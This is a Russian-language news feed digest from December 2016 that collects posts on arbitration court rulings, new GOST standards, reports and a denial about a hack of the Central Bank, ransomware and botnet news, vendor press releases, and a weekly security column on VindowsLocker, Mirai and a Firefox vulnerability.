    При принятии решения суд учел, что банк регулярно исполнял платежные поручения, направленные обществом за рамками установленного договором операционного дня. При этом было отмечено, что из договора не усматривается запрета на такие действия. Также договором не предусмотрена обязанность банка исполнять платежные поручения клиента на суммы, превышающие 200 тысяч руб., только после их подтверждения обществом; письма общества не свидетельствует о принятии банком на себя такой обязанности.

    Суд также отметил, что поскольку в утвержденном Банком России Положении о правилах осуществления перевода денежных средств от 19.06.2012 № 383-П содержится только требование к номеру платежного поручения о том, что он должен отличаться от нуля, у банка не было оснований для вывода о несоответствии платежного поручения № 1282 требованиям, предусмотренным законом и установленными в соответствии с ним банковскими правилами.

    По мнению суда, является необоснованной ссылка нижестоящих судов на статью 9 Федерального закона от 27.06.2011 № 161-ФЗ «О национальной платежной системе», регулирующую порядок использования электронных средств платежа. По мнению банка, составленное в электронном виде платежное поручение не относится к электронным средствам платежа.

    Кроме этого, в пунктах 4.6 и 4.9 Положения приведены разные порядки подтверждения исполнения распоряжения в электронном виде и распоряжения клиента при осуществлении операции с использованием электронного средства платежа.

    В такой ситуации у судов не было оснований для удовлетворения требований истца. Вынесенные по настоящему делу судебные акты были признаны подлежащими отмене как вынесенные на основании неверного применения норм материального права и при несоответствии выводов судов обстоятельствам дела, а также имеющимся в деле доказательствам.

    Арбитражный суд Северо-Западного округа отменил решение Арбитражного суда Республики Карелия и постановление Тринадцатого арбитражного апелляционного суда, и отказал обществу в иске к банку.

    Определением судьи Верховного Суда РФ в мае 2016 года в передаче кассационной жалобы ЗАО «Карлис-Пром» для рассмотрения в судебном заседании Судебной коллегии по экономическим спорам Верховного Суда РФ было отказано.

    Источник: Официальный сайт Верховного Суда Российской Федерации / Электронное правосудие по экономическим спорам
    http://www.arbitr.ru/

    orig: 2016-12-03 21:05:01 / http://rusrim.blogspot.com/2016/12/blog-post_93.html (click post title)



    Ботнет Kelihos распространяет вымогателя Troldesh

    Ботнет Kelihos недавно переключился на распространение вымогателей. По словам исследователей, вредоносная программа Troldesh как раз стала одной из распространяемых этим ботнетом.

    Kelihos активен уже приблизительно восемь лет и смог пережить две попытки уничтожения - в сентябре 2011 года и марте 2012 года. Этот ботнет был известен тем, что распространял в свое время вымогатели MarsJoke и Wildfire.

    Как было замечено специалистами, Kelihos распространяет шифровальщик Troldesh посредством спама, содержащего URL-адреса, ведущие на файл JavaScript и документ Microsoftinfo-icon Word. Согласно эксперту, это первый раз, когда ботнет использует файлы JavaScript, для заражения пользователей.

    Вредоносная программа шифрует пользовательские файлы и добавляет к ним расширение .no_more_ransom, что является иронической отсылкой к кампании NoMoreRansom, которая была создана для борьбы с вымогателями и помощи их жертвам.

    Темы всех спам-писем, распространяющих этого вымогателя намекала на кредитную задолженность. Жертву информировали о якобы имеющейся у нее задолженности и предлагали скачать вложение, чтобы ознакомиться с подробностями. После открытия подобного вложения, происходило инфицирование компьютера вредоносной программой Troldesh.

    После того, как файлы зашифрованы, вымогатель отображает пользователю записку с требованием выкупа (как на английском, так и на русском языках) на рабочем столе. Жертве рекомендуется связаться с авторами вредоноса через почту Gmail, чтобы получить инструкции, необходимые для расшифровки файлов. Также указывается, что нужно скачать браузер Tor для доступа к адресам .onion.

    Кроме того, Troldesh дополнительно загружает другие вредоносные программы и связывается с командным центром по определенному адресу. Среди загружаемых Troldesh вредоносных программ присутствует Pony – вредонос, похищающий конфиденциальную информацию пользователей.

    orig: 2016-12-03 17:06:39 / https://www.anti-malware.ru/news/2016-12-03/21609 (click post title)



    ГОСТы на сайте Росстандарта: Что почитать?


    На сайте Федерального агентства по техническому регулированию и метрологии ( http://www.gost.ru/wps/portal/ ) в ноябрьском 2016 года разделе (  http://protect.gost.ru/default.aspx?control=6&month=11&year=2016 ) дополнительно выложены следующие документы:

    ГОСТ Р МЭК 62023-2016 «Структурирование технической информации и документации» объёмом 28 страниц, вводится с 01.06.2017 года, см.  http://protect.gost.ru/v.aspx?control=8&baseC=6&page=4&month=11&year=2016&search=&RegNum=1&DocOnPageCount=15&id=197461

    Стандарт разработан на основе одноименного международного стандарта IEC 62023-2011, Structuring of technical information and documentation (вводную часть которого можно посмотреть здесь: https://webstore.iec.ch/preview/info_iec62023%7Bed2.0%7Db.pdf или здесь: https://www.evs.ee/preview/evs-en-62023-2012-en.pdf ). Полный текст проекта IEC 62023 выложен по адресу http://portal.tee.gr/portal/page/portal/SCIENTIFIC_WORK/scient_typopoiisi/epitropes/ELOT-TE21/TE21/Tab4/3_1011e_CDV.pdf .

    Как отмечается в аннотации, настоящий стандарт устанавливает правила применения метода структурирования и документирования технической информации, используя для этого основной (руководящий) документ с целью группировки и упорядочивания информации для каждого объекта.

    Стандарт можно рассматривать в качестве связующего эвена, объединяющего принципы структурирования системы и принципы структурирования документации, которые обеспечивают:

    Стандарт содержит терминологический раздел, в котором обращают на себя внимание следующие термины:
    3.2.1 документ (document): Фиксированный и структурированный объем информации, которым можно управлять и осуществлять взаимообмен между пользователями и системами в качестве отдельной единицы информации.

    Примечание 1 — Единица информации не обязательно может восприниматься пользователем, она обычно хранится на носителях данных.

    Примечание 2 — Термин «документ» не ограничен его значением в юридическом смысле.

    Примечание 3 — Документ могут обозначать в соответствии с типом информации и формой его представления, например, в виде обзорной диаграммы, таблицы соединений или функциональной схемы.

    [МЭК 61082-1:2014, определение 3.1.2 и МЭК 82045-1:2001, определение 3.2.3]

    3.2.3 документация (documentation). Совокупность документов, относящихся к конкретной тематике.

    Примечание 1 — Может включать в себя техническую, коммерческую и.1 или иную документацию.

    Примечание 2 — Термин «тематика» может относиться к объектам, рассматриваемым в соответствии с МЭК 81346 или другими принятыми соображениями.

    Примечание 3 — Документация может состоять из документов, составных документов и комплектов документов.

    Примечание 4 — Число и вид документов в документации могут зависеть от ее назначения.

    [МЭК 61355-1:2008, определение 3.5]ГОСТ Р 57220-2016 «Комплексная экспертиза культурных ценностей. Требования» объёмом 12 страниц, вводится с 01.04.2017 года, см. http://protect.gost.ru/v.aspx?control=8&baseC=6&page=3&month=11&year=2016&search=&RegNum=1&DocOnPageCount=15&id=197669

    Данный стандарт разработан Федеральным бюджетным учреждением «Российский федеральный центр судебной экспертизы» при Министерстве юстиции Российской Федерации и Евразийской ассоциацией содействия судебно-экспертной деятельности совместно с рабочей группой в составе 48 членов. Внесен Техническим комитетом по стандартизации ТК134 «Судебная экспертиза».

    Как отмечается в документе, стандарт разработан для применения лицами и организациями, проводящими судебно-экспертное исследование культурных ценностей в уголовном, гражданском, арбитражном и административном процессах, а также может применяться физическими лицами и организациями при проведении прочих видов экспертизы культурных ценностей.

    Стандарт устанавливает требования к порядку проведения комплексной экспертизы культурных ценностей, включающей в себя в зависимости от обстоятельств дела искусствоведческое, технико-технологическое, материаловедческое, товароведческое, почерковедческое, трассологическое, молекулярно-генетическое исследования. При необходимости комплексная экспертиза может включать в себя и иные виды исследований.

    Положения настоящего стандарта распространяются также на судебные экспертизы культурных ценностей, проводимые в рамках одного рода (вида) экспертиз.

    Среди прочего, стандарт устанавливает требования к заключению эксперта, и срок его хранения – «не менее 15 лет», если иное не предусмотрено законодательством (п.3.3.8). Замечу, что в последнее время случаи установления стандартами сроков хранения участились, и порой это создает проблемы, поскольку пользователям не всегда легко определить правовой статус стандартов и степень обязательности их требований в контексте конкретной организации.

    Источник: сайт Росстандарта
    http://www.gost.ru/wps/portal/

    orig: 2016-12-03 08:00:22 / http://rusrim.blogspot.com/2016/12/blog-post_3.html (click post title)



    ЦБ РФ опроверг информацию о краже хакерами 2 млрд рублей

    Ранее телеканал CNN сообщил о кибератаке на Центробанк России.

    Хакеры вывели 2 млрд рублей со счетов российских банков, которые хранили средства в Центробанке России, сообщил в пятницу, 2 декабря, телеканал CNN со ссылкой на представителя российского регулятора. По информации телеканала, злоумышленники пытались вывести 5 млрд рублей, однако атаку удалось частично отразить.

    «Нам повезло вернуть часть денег», - цитирует CNN слова замруководителя управления безопасности и защиты информации ЦБ Артема Сычева. В Центробанке журналистам также сообщили, что кибератаке подверглись некоторые частные банки, со счетов которых были похищены средства клиентов. Регулятор не предоставил информацию о подробностях хакерской атаки.

    Позже Банк России опроверг информацию о хищении 2 млрд рублей с корреспондентских счетов ЦБ РФ, сообщило информагентство «ТАСС». Как заявили в пресс-службе регулятора, данная информация не соответствует действительности.

    «В Обзоре финансовой стабильности, который был представлен накануне вечером, речь шла об убытках, которые понесли коммерческие банки и их клиенты, в результате хакерских атак за весь 2016 год», - заявили в Центробанке.

    В пятницу, 2 декабря, Федеральная служба безопасности РФ сообщила об угрозе масштабных хакерских атак со стороны иностранных спецслужб на крупнейшие отечественные банки и другие организации с целью дестабилизировать российскую финансовую систему.

    Ранее стало известно о хакерской атаке на один из российских банков, в результате которой финорганизация потеряла более 100 млн рублей.

    orig: 2016-12-03 07:34:17 / http://www.securitylab.ru/news/484635.php (click post title)



    Со счетов ЦБ похищено 2 млрд рублей

    По информации американской телекомпании CNN, у российских банков, счета которых находились в Центробанке, хакеры похитили 2 миллиарда рублей. В ЦБ эту информацию подтвердили.

    Изначально кибермошенники пытались украсть пять миллиардов рублей, но кибератаку удалось отразить, сообщает РИА Новости. Заместитель начальника Главного управления безопасности и защиты информации ЦБ Артем Сычев сообщил: "Нам повезло вернуть часть денег".

    При этом в Центробанке не уточнили, когда произошел взлом. Информация о хищении средств из ЦБ появилась на фоне сообщения ФСБ России о подготовке иностранными спецслужбами масштабных кибератак против России с целью дестабилизировать ее финансовую систему. Как сообщалось, центры, предназначенные для этих атак, расположены в Нидерландах и принадлежат украинской компании BlazingFast, пишет vesti.ru.

    orig: 2016-12-03 07:26:03 / https://www.anti-malware.ru/news/2016-12-03/21608 (click post title)



    Арбитражная практика: Уведомление по электронной почте


    Арбитражный суд Свердловской области в декабре 2015 года рассмотрел дело №А60-47501/2015, в котором поставщик электроэнергии ОАО «ЭнергосбыТ Плюс» не смог доказать антимонопольному ведомству и судам факт надлежащего уведомления по электронной почте о предстоящем отключении электроэнергии. Цена вопроса – штраф в размере более 737 тысяч рублей.

    Поставщик в качестве доказательства доставки представил электронное сообщение Microsoft Outlook (тема: «Ретранслировано: уведомление об ограничении дог. 60825») в котором было указано, что доставка получателям или группам выполнена, - но сервер назначения не прислал уведомления о доставке. На этом основании суд сделал вывод о том, что фактов получения или уклонения от получения заявителем уведомления нет, а доказательства его доставки отсутствуют.

    Суть спора

    В январе 2015 года общество ОАО «ЭнергосбыТ Плюс» произвело отключение электрической энергии многоквартирных домов. Общество ООО «Управляющая компания «Константа плюс» обратилась в Управлением Федеральной антимонопольной службы по Свердловской области с жалобой.

    В сентябре 2015 года Управлением ФАС был признан факт нарушения обществом порядка введения ограничения потребления электрической энергии, в части надлежащего уведомления об этом потребителя, и общество 24 сентября 2015 года было привлечено к ответственности в виде административного штрафа (ч. 1 ст. 14.31 Кодекса об административных правонарушениях) в размере более 737 тысяч руб.

    Не согласившись с этим решением, общество ОАО «ЭнергосбыТ Плюс» обратилось в арбитражный суд с иском.

    Позиция Арбитражного суда Свердловской области

    Между ОАО «ЭнергосбыТ Плюс» и ООО «Управляющая компания «Константа плюс» в апреле 2013 года был заключен договор энергоснабжения, в рамках которого объектами электроснабжения являлись многоквартирные дома, находящиеся в управлении компании.

    В связи с возникновением задолженности по договору поставщик в январе 2015 года направил уведомление с требованием ее погасить и о планируемом с 26 января 2015 года введении ограничения режима электропотребления в случае неоплаты. 26-29 января 2015 года с 10 до 14 часов подача электричества была ограничена, о чем были составлены акты.

    В связи с произведением частичной оплаты задолженности, управляющей компании было сообщено о предполагаемом времени восстановления режима потребления электрической энергии (мощности) с 14:00 часов 30 января 2015 года.

    Суд отметил, что «Правила полного и (или) частичного ограничения режима потребления электрической энергии», утвержденные Постановлением Правительства РФ от 04.05.2012 № 442,  устанавливают обязательное предварительное письменное уведомление потребителя о планируемом введении ограничения режима потребления (которое подписывается инициатором введения ограничения или сетевой организацией и вручается потребителю под расписку либо направляется заказным почтовым отправлением с уведомлением о вручении, если иной способ уведомления не предусмотрен договором энергоснабжения).

    Согласно п. 2.1.2 договора энергоснабжения, уведомление об ограничении режима потребления должны направляться любым из перечисленных способов: электронной почтой, факсограммой, телеграммой, телетайпограммой, телефонограммой, почтовым отправлением, либо вручается непосредственно под расписку.

    Поставщик в своих пояснениях ссылался на пункт 1 статьи 165.1. Гражданского кодекса Российской Федерации (ГК РФ), согласно которому заявления, уведомления, извещения, требования или иные юридически значимые сообщения, с которыми закон или сделка связывает гражданско-правовые последствия для другого лица, влекут для этого лица такие последствия с момента доставки сообщения ему или его представителю.

    Сообщение считается доставленным и в тех случаях, если оно поступило лицу, которому оно направлено, но по обстоятельствам, зависящим от него, не было ему вручено или адресат не ознакомился с ним.

    Согласно пункту 65 Постановления Пленума Верховного суда РФ от 23.06.2015 № 25 «О применении судами некоторых положений Раздела I части первой Гражданского кодекса РФ», если иное не установлено законом или договором и не следует из обычая или практики, установившейся во взаимоотношениях сторон, юридически значимое сообщение может быть направлено, в том числе, посредством электронной почты, факсимильной и другой связи, осуществляться в иной форме, соответствующей характеру сообщения и отношений, информация о которых содержится в нем, когда можно достоверно установить, от кого оно исходило и кому оно адресовано (например, в форме размещения на сайте хозяйственного общества в сети «Интернет» информации для участников этого общества, в форме размещения на специальном стенде информации об общем собрании собственников помещений в многоквартирном доме и т.п.).

    Бремя доказывания факта направления сообщения и его доставки адресату лежит на лице, его направившем.

    Риск неполучения поступившей корреспонденции несет адресат. Если в юридически значимом сообщении содержится информация об односторонней сделке, то при его невручении по обстоятельствам, зависящим от адресата, считается, что содержание сообщения, было им воспринято, и сделка повлекла соответствующие последствия (например, договор считается расторгнутым вследствие одностороннего отказа от его исполнения).

    Уведомление на ограничение режима потребления было направлено 15 января 2015 года в управляющую компанию в соответствии с пунктом 2.1.2 договора по электронной почте по адресу, указанному в заявлении на заключение договора в 2013 году.

    Поставщик сообщил, что в электронном сообщении Microsoft Outlook от 15 января 2015 года было подтверждено, что доставка выполнена.

    При этом было установлено, что в электронном сообщении Microsoft Outlook (тема: «Ретранслировано: уведомление об ограничении дог. 60825»), на которое ссылался поставщик, было указано, что доставка получателям или группам выполнена, но сервер назначения не прислал уведомления о доставке. На этом основании суд сделал вывод о том, что доказательств получения или уклонения от получения заявителем уведомления нет, отсутствуют и доказательств его доставки.

    По мнению суда, общество ОАО «ЭнергосбыТ Плюс», не удостоверившись в получении ООО «УК «Константа плюс» уведомления, 26 по 29 января 2015 года ввело частичное (с 10-00 до 14-00) ограничение режима потребления электрической энергии находящихся в управлении ООО «УК «Константа плюс» многоквартирных домов.

    При таких обстоятельствах, суд признал, что решение антимонопольного органа является законным и обоснованным.

    Арбитражный суд отказал обществу в удовлетворении заявленных требований.

    Семнадцатый арбитражный апелляционный суд в апреле 2016 года оставил без изменения решение Арбитражного суда Свердловской области, апелляционную жалобу ООО «ЭнергосбыТ Плюс» – без удовлетворения.

    Арбитражный суд Уральского округа в августе 2016 года оставил без изменения решение Арбитражного суда Свердловской области и постановление Семнадцатого арбитражного апелляционного суда, а кассационную жалобу ОАО «ЭнергосбыТ Плюс»  – без удовлетворения.

    Источник: Официальный сайт Верховного Суда Российской Федерации / Электронное правосудие по экономическим спорам
    http://www.arbitr.ru/

    orig: 2016-12-02 21:05:10 / http://rusrim.blogspot.com/2016/12/blog-post_97.html (click post title)



    HID Global совместно с Honeywell Building Solutions разрабатывает новые способы применения решений мобильного доступа

    «HID Global разделяет с Honeywell стремление обеспечить пользователей качественными решениями мобильного доступа в «умные» здания, — говорит Харм Раадстак, вице-президент и управляющий директор бизнес-решений контроля физического доступа HID Global. — Вместе с Honeywell мы с нетерпением ожидаем дальнейшего расширения возможностей применения надежных идентификаторов на мобильных устройствах для различных инженерных систем и приложений».

    Для создания индивидуального решения мобильного доступа Honeywell были использованы специальные консультации по внедрению и тестированию в рамках сервиса профессиональных услуг HID Professional Services ™, наряду с надежной технологией HID Seos®и комплектами разработчика ПО. Honeywell Vector Occupant включает в себя Twist&Go — запатентованную технологию управления жестами HID Global, позволяющую открывать двери на расстоянии с помощью смартфона.

    Функционируя независимо от основных систем здания, приложение включает в себя также систему мобильного доступа HID Global, позволяющую администраторам упростить управление надежными идентификаторами. Технология, реализованная в приложении, поддерживает мобильные учетные данные, обеспечивая более надежный контроль и управление доступом.

    Приложение Honeywell Vector Occupant раскрывает преимущества решений HID Global, которые являются частью мобильной инициативы компании. Инициатива направлена на то, чтобы помочь пользователям свободно использовать различные приложения с надежным идентификатором, внедренным в «умные» устройства.

    Чтобы следить за новостями компании, посетите пресс-центр HID Global, читайте блог, смотрите видео и посетите страницы HID Global в  Facebook, LinkedIn  и Twitter.

    orig: 2016-12-02 18:47:42 / http://www.iso27000.ru/press-relizy/hid-global-sovmestno-s-honeywell-building-solutions-razrabatyvaet-novye-sposoby-primeneniya-reshenii-mobilnogo-dostupa (click post title)



    Получен сертификат ФСТЭК России о соответствии маршрутизатора Cisco требованиям к контролю отсутствия недекларированных возможностей

    «Этот проект стратегически важен для Cisco, так как, с одной стороны, в числе прочих демонстрирует стремление компании выпускать продукцию в строгом соответствии с требованиями российского законодательства, а с другой ‒ знаменует выход на новый, еще более высокий, уровень сертификации, – отмечает вице-президент Cisco по работе в России/СНГ Джонатан Спарроу. – Мы планируем продолжить работу по сертификации в области контроля отсутствия НДВ и для других продуктовых линеек Cisco, чтобы гарантировать безопасность и абсолютную прозрачность наших решений для российских заказчиков. Данная сертификация полностью соответствует глобальной политике Cisco, исключающей создание недокументированных возможностей, закладок или других способов обхода механизмов защиты продукции Cisco».

    Сертификат соответствия № 3629 подтверждает, что интегрированный сервисный маршрутизатор ST2911Р (такое название получил сертифицированный продукт на базе Cisco 2911R, выпускаемый в Твери компанией «С-Терра СиЭсПи») соответствует требованиям руководящих документов «Защита от несанкционированного доступа к информации. Часть 1. Программное обеспечение средств защиты информации. Классификация по уровню контроля отсутствия недекларированных возможностей» по 4-му уровню контроля и «Средства вычислительной техники. Межсетевые экраны. Защита от несанкционированного доступа к информации. Показатели защищенности от несанкционированного доступа к информации» по 3-му классу защищенности. Выданный сертификат сроком на три года свидетельствует о появлении на российском рынке первого решения Cisco, сертифицированного по схеме серийного производства в соответствии с требованиями к контролю отсутствия НДВ.

    «Данная сертификация свидетельствует о готовности Cisco реализовывать комплексные проекты для  обеспечения соответствия нормативным требованиям, – говорит Василий Томилин, ведущий специалист Cisco по информационной безопасности. – Cisco последовательно придерживается принципов прозрачности своих решений для потребителей и специалистов, ответственности компании за результаты своей работы и обеспечения максимального уровня защищенности своей продукции. Именно поэтому прохождение процедур сертификации и аттестации имеет для нас большое значение. Действующая в компании программа Technology Verification Service позволяет крупным заказчикам и регуляторным агентствам разных стран получать подтверждение отсутствия недекларированных возможностей в продукции Cisco в соответствии с согласуемой в каждом случае процедурой. Такой подход обеспечивает выполнение требований заинтересованной стороны и надежную защиту интеллектуальной собственности Cisco».

    Маршрутизаторы Cisco ISR второго поколения формируют надежную платформу для мультисервисной интеграции предприятий или офисов компаний любого размера. Защищенное подключение удаленных офисов и работников реализуется, в том числе, с использованием сертифицированного ФСБ России модуля криптографической защиты информации (VPN-модуль).

    «Мы давно и успешно сотрудничаем с компанией Cisco, предлагая российским пользователям сертифицированные VPN-продукты, интегрируемые в оборудование Cisco, в частности, большой популярностью у сетевых инженеров пользуется модуль МСМ, совместимый с маршрутизаторами Cisco серии 2911, – комментирует событие Сергей Мещеряков, генеральный директор ООО «С-Терра СиЭсПи». – Маршрутизатор ST2911P расширяет спектр доступных российских решений, соответствующих требованиям отечественного законодательства, и позволяет строить на оборудовании С‑Терра и Cisco функциональные системы, в том числе, для защиты ИСПДн и ГИС».

    orig: 2016-12-02 18:44:55 / http://www.iso27000.ru/press-relizy/poluchen-sertifikat-fstek-rossii-o-sootvetstvii-marshrutizatora-cisco-trebovaniyam-k-kontrolyu-otsutstviya-nedeklarirovannyh-vozmozhnostei (click post title)



    АРБ и Банк России сотрудничают с ФСБ для предотвращения последствий возможных кибератак на банки

    Ассоциация российских банков и Банк России знают об этой опасности и готовы принять необходимые меры для борьбы с распространением ложной информации.

    Согласно информации ФСБ и Банка России,  ожидается атака на сайты и мобильные сервисы банков, а также рассылка сотен тысяч SMS-сообщений, массовые публикации в социальных сетях и т.д., сеющие панику и призывающие к массовому закрытию депозитов.

    Злоумышленниками может распространяться ложная информация об отсутствии наличности в банкоматах некоторых банков, об «утечке информации» о введении ограничений на выдачу денежных средств и закрытии отделений некоторых банков, о получении от якобы «достоверных источников» информации о скачках курса рубля и о планируемом ограничении выдачи валюты.

    Эта недостоверная информация может сопровождаться комментариями от якобы взволнованных граждан, «подтверждающих» эту ложную информацию.

    Между тем, ситуация в банковском секторе стабильна, российские банки способны выполнять свои обязательства перед вкладчиками и другими кредиторами. По информации АРБ, Банк Росси и Минфин в случае необходимости готовы предоставить любую необходимую ликвидность.

    АРБ просит кредитные организации оперативно направлять в ассоциацию любую информацию, связанную с кибератаками.

     

    orig: 2016-12-02 18:42:52 / http://www.iso27000.ru/novosti-i-sobytiya/arb-i-bank-rossii-sotrudnichayut-s-fsb-dlya-predotvrascheniya-posledstvii-vozmozhnyh-kiberatak-na-banki (click post title)



    Официальное сообщение компании Positive Technologies по поводу возможной дестабилизации финансовой системы РФ

    Мы считаем, что атаки, о которых предупреждает Федеральная служба безопасности, вполне реальны.

    Федеральная служба безопасности РФ выпустила сообщение о том, что получена информация о подготовке иностранными спецслужбами масштабных кибератак, целью которых является дестабилизация финансовой системы РФ, включая деятельность ряда крупнейших российских банков. Ожидается, что кибернападения будут сопровождаться массовыми рассылками SMS-сообщений и публикациями провокационного характера в социальных сетях (в отношении кризиса кредитно-финансовой системы России, банкротства и отзыва лицензий у ведущих банков).
     
    Мы считаем, что атаки, о которых предупреждает Федеральная служба безопасности, вполне реальны. Более того, практика расследований, проводимых экспертами Positive Technologies, подтверждает, что в последние 1-2 года резко увеличилось число целевых атак на банки, а банковский сектор остается в числе наиболее интересных для киберпреступников отраслей. Любая атака на современный банк сегодня чаще всего является гибридной: нацеленной как на остановку сервисов, так и на прямые финансовые хищения, использующей в качестве инструмента технологические возможности, а также методы социальной инженерии и манипуляции.
    Успешно противостоять таким атакам возможно только обеспечив эффективное взаимодействие государственных структур (Банк России, Минкомсвязи и пр.), организаций банковского сектора и телекоммуникационных операторов, на чьей стороне есть возможность вовремя отсечь сетевую активность злоумышленников, что позволит «сбить» современную атаку до наступления критической точки.

    Каждый банк сегодня строит (или поддерживает в актуальном состоянии уже построенную) систему защиты, руководствуясь в том числе и общими правилами игры, сформированными Банком России в стандартах семейства СТО БР ИББС, включающих в себя требования и рекомендации по разным аспектам обеспечения безопасности (начиная от общих вопросов и заканчивая специфическими рекомендациями по предотвращению и расследованию мошеннических действий). Банком России создан и запущен FinCERT, работа которого позволяет своевременно оповещать банковское сообщество о новых типах и схемах атак. Разрабатываются методические рекомендации по созданию корпоративных и ведомственных центров кибербезопасности (Security Operations Center, SOC), и некоторые такие центры уже начали эффективно работать. Принимаются государственные и отраслевые стандарты, описывающие правила разработки безопасных приложений, поиска уязвимостей в программном обеспечении, реагирования на инциденты и т.п. Завершается подготовка законопроекта «О безопасности критической информационной инфраструктуры РФ», принятие которого создаст основу для создания общегосударственной системы обнаружения, предупреждения и ликвидации последствий компьютерных атак на органы государственной власти и коммерческие организации.

    Это колоссальная работа, которой занимаются узкоспециализированые организации, и публике она не видна и не очень интересна. Но каким-либо образом повлиять на ситуацию может только она.
     
    Клиентам банков, в свою очередь, мы рекомендуем как можно внимательнее отнестись к данному сообщению, так как одну из его основных целей видим в предупреждении возможных манипуляций (в том числе и мошеннических) со стороны киберпреступников. За последние несколько лет неоднократно случались публичные инциденты, когда клиентов банков сподвигали на массовый вывод денежных средств сообщения, полученные в SMS или от доброжелателей в социальных сетях, оказывавшиеся обманом. Любое сообщение об изменении статуса банковской организации в целом или отдельного банковского счета в частности должно исходить от официального источника.

    orig: 2016-12-02 18:34:42 / http://www.securitylab.ru/news/484634.php (click post title)



    Security Week 48: локер с техподдержкой, мутации Mirai, уязвимость в Firefox и Tor Browser

    Начнем наш пятничный вечерний дайджест с новости о криптолокере, который настолько плох с технической точки зрения, что это даже интересно. Хотя я не могу достоверно знать, что происходит по ту сторону ландшафта угроз, могу представить, как создатели более приличных троянов-вымогателей комментируют данное творение в стиле мастера Безенчука из «Двенадцати стульев». "Уже у них и матерьял не тот, и отделка похуже, и кисть жидкая, туды ее в качель".

    Троян VindowsLocker (да, именно так, через V) подробно описан специалистами компании Malwarebytes и независимым исследователем TheWack0lian (новость, исследование). После шифрования данных троян предлагает позвонить в техподдержку (бесплатный звонок на территории США, все как у приличных людей), и обсудить возможность выкупа в 350 долларов. Командного центра нет, вместо него троян отправляет ключи для разблокировки на pastebin. Сделано все максимально криво: в большинстве случаев ключ нормально не отправляется, соответственно и преступники его не видят. То есть деньги (после переговоров) они собрать могут, а расшифровать данные — нет.

    После звонка в «техподдержку» происходит следующее: создается сессия RDP, и скаммеры прямо на компьютере пользователя сначала открывают официальную страницу техподдержки Microsoft, а поверх ее — форму регистрации, где мотивируют жертв передать им номер соц. страхования и кредитной карты с секретным кодом. В этом косноязычном киберпостмодернизме, если постараться, можно разглядеть попытку нацелить криптолокерский бизнес на более широкую аудиторию — ту, что с биткоином и даркнетом справиться не сможет. Но нет, на самом деле это просто просто очень плохой троян.

    Информации о методах заражения нет, но скорее всего там тоже все уныло. Я рад за коллег из Malwarebytes, которые написали для данного трояна дешифровщик, только данная вредоносная программа скорее является каноничным антипримером вирусописания, а не реальной массовой угрозой.

    В Mozilla Foundation закрыли серьезные уязвимости в Firefox
    Новость. Информация о патче. Подробное описание на BleepingComputer. Информация для браузера Tor.

    28 ноября для двух свежих версий Firefox (49 и 50) был выпущен экстренный патч. Уязвимость при ряде условий позволяет обойти политику единого источника (same origin policy). 30 ноября был выпущен еще один апдейт, на этот раз закрывающий проблему в обработчике графики в формате SVG. А вот эта уязвимость способна привести к выполнению произвольного кода. Данную уязвимость уже активно эксплуатировали на момент выпуска патча: с ее помощью собиралась информация о пользователе и отправлялась на удаленный сервер. Тактика атакующих при этом была весьма похожа на методы ФБР для деанонимизации пользователей, использованные ранее. Об этом, кстати, сообщил тот же независимый исследователь TheWack0lian из предыдущей новости.

    Ботнет, основанный на коде Mirai, атаковал роутеры клиентов Deutsche Telekom, вызвав проблем с доступом к сети
    Новость. Исследование «Лаборатории».

    Ботнет Mirai и не думает пропадать из актуальных новостей по безопасности, благодаря выложенному исходному коду, который, на очередном витке развития драмы, взялись допиливать. У ботнета, по сути, есть два режима работы — атаковать кого попало и искать новые жертвы. По второй части на этой неделе проблемы возникли у немецкого телекома Deutsche Telekom. Все началось, как обычно, с массовых жалоб пользователей на низкое качество доступа к интернету. Оказалось, пара моделей роутеров, поставляемых провайдером конечным пользователям, были атакованы очередной мутацией Mirai.

    Наши эксперты подробно описали, почему так произошло, но методы расширения количества зомби-компьютеров были объяснены и многими другими наблюдателями. На этот раз проблема кроется в специализированном протоколе TR-064, который используется провайдерами для удаленного управления пользовательскими устройствами. В том случае, если интерфейс управления (на порте 7547) доступен снаружи, появляется возможность либо загрузить и выполнить на устройстве произвольный код, либо сделать то же самое, но через стадию открытия доступа к традиционному веб-интерфейсу. Попытка атаки выглядит примерно так:

    По данным института SANS, теоретически подверженных устройств насчитывается более 40 миллионов — это те, у кого сервисный протокол просто доступен из сети. Что касается атаки на Deutsche Telekom, то она успехом не увенчалась — попытка атаки привела лишь к тому, что примерно 5% роутеров перестали нормально работать. Отсюда и перебои с доступом к сети. В любом случае, пользователям рекомендуют «попробовать выключить и включить»: вредоносный код сохраняется только в оперативной памяти.

    Что еще произошло:
    Массовая атака на компьютеры департамента общественного транспорта Сан-Франциско (поражено более 2 тысяч компьютеров, запрошен выкуп в 100 биткоинов) привела к интересному побочному эффекту: чтобы не парализовало движение, оператор отключил платежные автоматы и обеспечил жителям города бесплатный проезд в День Благодарения.

    Древности
    «V-707»

    Резидентный неопасный вирус. Поражает .COM-файлы при их загрузке в память. Изменяет первые пять байт файла (MOV AX, Start_Virus, PUSH AX, RET near) и дописывается в его конец.

    Активизируется только в DOS 3.30, определяет (сканированием памяти) точки входа обработчиков 13h-го и 21h-го прерывания в DOS и активно их использует при заражении файлов. Располагается в самых старших адресах памяти, корректируя последний MCB и уменьшая размер доступной памяти (слово по адресу 0000:0413).

    При заражении ведет подсчет уже зараженных файлов, и как только встречается 30-й зараженный файл, устанавливает прерывание 8h на подпрограмму генерации звукового сигнала. Перехватывает int 8 и int 21h.

    Цитата по книге «Компьютерные вирусы в MS-DOS» Евгения Касперского. 1992 год. Страницa 89.

    Disclaimer: Данная колонка отражает лишь частное мнение ее автора. Оно может совпадать с позицией компании «Лаборатория Касперского», а может и не совпадать. Тут уж как повезет.

    orig: 2016-12-02 17:42:05 / https://habrahabr.ru/post/316750/ (click post title)



    Общее. Онлайн ИБ тренинг Kaspersky Interactive Protection Simulation

    В этот четверг Лаборатория Касперского провела онлайн тренинг по информационной безопасности KasperskyInteractive Protection Simulation Winter Season.
